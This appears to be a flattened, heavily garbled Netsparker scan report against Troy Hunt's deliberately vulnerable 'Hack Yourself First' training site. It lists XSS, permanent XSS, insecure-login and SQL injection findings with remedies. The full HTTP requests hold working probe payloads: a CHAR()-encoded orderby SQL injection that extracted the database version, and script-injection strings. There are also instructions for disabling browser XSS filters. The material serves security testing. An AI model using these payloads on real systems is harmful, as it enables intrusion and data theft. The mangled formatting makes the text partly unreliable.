ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14292Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
23 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
12 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
24 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
13 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
14 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
